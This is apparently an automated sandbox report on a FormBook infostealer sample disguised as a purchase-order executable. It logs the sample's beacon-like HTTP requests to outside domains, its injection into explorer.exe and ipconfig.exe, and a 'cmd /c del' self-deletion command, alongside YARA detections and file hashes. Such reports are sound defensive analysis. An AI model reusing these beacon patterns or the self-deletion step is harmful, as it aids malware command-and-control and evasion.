                                                                        Nov 20, 2020 11:08:05.674489975 CET5416OUTGET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.ariasu-nakanokaikei.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:05.691483021 CET5417INHTTP/1.1 301 Moved Permanently
                                                                        Server: CloudFront
                                                                        Date: Fri, 20 Nov 2020 10:08:05 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 183
                                                                        Connection: close
                                                                        Location: https://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr
                                                                        X-Cache: Redirect from cloudfront
                                                                        Via: 1.1 a7d79448ea7ebb4dc0f6ccd1869d1444.cloudfront.net (CloudFront)
                                                                        X-Amz-Cf-Pop: MXP64-C3
                                                                        X-Amz-Cf-Id: PiI-7O_5hgynQNqcUEPysWt8N7YtagWkWw-rfcfszvXMzZkpJvTNCw==
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.749761103.224.182.24280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:08:11.059438944 CET5419OUTGET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.realitytvstockwatch.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:08:11.264870882 CET5419INHTTP/1.1 302 Found
                                                                        Date: Fri, 20 Nov 2020 10:08:11 GMT
                                                                        Server: Apache/2.4.25 (Debian)
                                                                        Set-Cookie: __tad=1605866891.2635384; expires=Mon, 18-Nov-2030 10:08:11 GMT; Max-Age=315360000
                                                                        Location: http://ww25.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr&subid1=20201120-2108-1134-9a4d-df9dc2e636a2
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: Purchase Order 40,7045$.exe PID: 5468 Parent PID: 5664

                                                                        General

                                                                        Start time:11:06:24
                                                                        Start date:20/11/2020
                                                                        Path:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
                                                                        Imagebase:0x7fffae0c0000
                                                                        File size:369664 bytes
                                                                        MD5 hash:4142C1713DA2F4F94BEC71BFED46587B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: Purchase Order 40,7045$.exe PID: 4392 Parent PID: 5468

                                                                        General

                                                                        Start time:11:06:24
                                                                        Start date:20/11/2020
                                                                        Path:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Imagebase:0x7fffae0c0000
                                                                        File size:369664 bytes
                                                                        MD5 hash:4142C1713DA2F4F94BEC71BFED46587B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: explorer.exe PID: 3292 Parent PID: 4392

                                                                        General

                                                                        Start time:11:06:27
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff662bf0000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: ipconfig.exe PID: 6420 Parent PID: 3292

                                                                        General

                                                                        Start time:11:06:39
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                        Imagebase:0x140000
                                                                        File size:29184 bytes
                                                                        MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Analysis Process: cmd.exe PID: 6524 Parent PID: 6420

                                                                        General

                                                                        Start time:11:06:43
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
                                                                        Imagebase:0x870000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6540 Parent PID: 6524

                                                                        General

                                                                        Start time:11:06:44
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff774ee0000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >